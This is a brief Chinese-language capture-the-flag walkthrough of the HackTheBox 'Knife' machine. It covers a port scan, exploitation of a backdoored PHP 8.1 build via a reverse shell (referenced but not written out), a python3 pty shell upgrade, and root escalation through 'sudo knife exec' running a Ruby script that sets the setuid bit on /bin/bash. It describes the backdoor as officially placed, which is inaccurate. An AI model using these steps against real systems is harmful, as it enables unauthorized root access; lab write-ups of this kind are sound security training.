hackthebox knife

扫一下端口1632740641_6151a521dd859bd6bc3b9.png!small

然后发现有80端口,于是去访问1632740685_6151a54d0724f34e71e1b.png!small

用工具发现它是用php8.1写的,8.1有官方留的后门1632740800_6151a5c002226c234aa23.png!small

于是这样可以写一个shell,可以参考php8.1漏洞
记得拿nc监听端口1632740817_6151a5d1dedcfb4442327.png!small

说找找有没有python ,建立一个更好的shell
于是which python3
有python3,打出命令

python3 -c 'import pty; pty.spawn("/bin/bash")'

看起来像是写了个,小脚本,这里一句话反弹shell,有很多
参考常用一句话反弹shell
然后我们到根目录找到 第一个flag users.txt,一般它这个靶场一个flag在home,一个在root

1632740990_6151a67ebe949a6b21640.png!small

然后就该提权了

echo "system('chmod +s /bin/bash')" > exploit.rb
ls
sudo /usr/bin/knife exec exploit.rb
ls -al /bin/bash
/bin/bash –p

1632741063_6151a6c7d4d017ede06a7.png!small

然后进入root文件夹,获取root.txt

1632741085_6151a6dd05a4b944bfd57.png!small

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发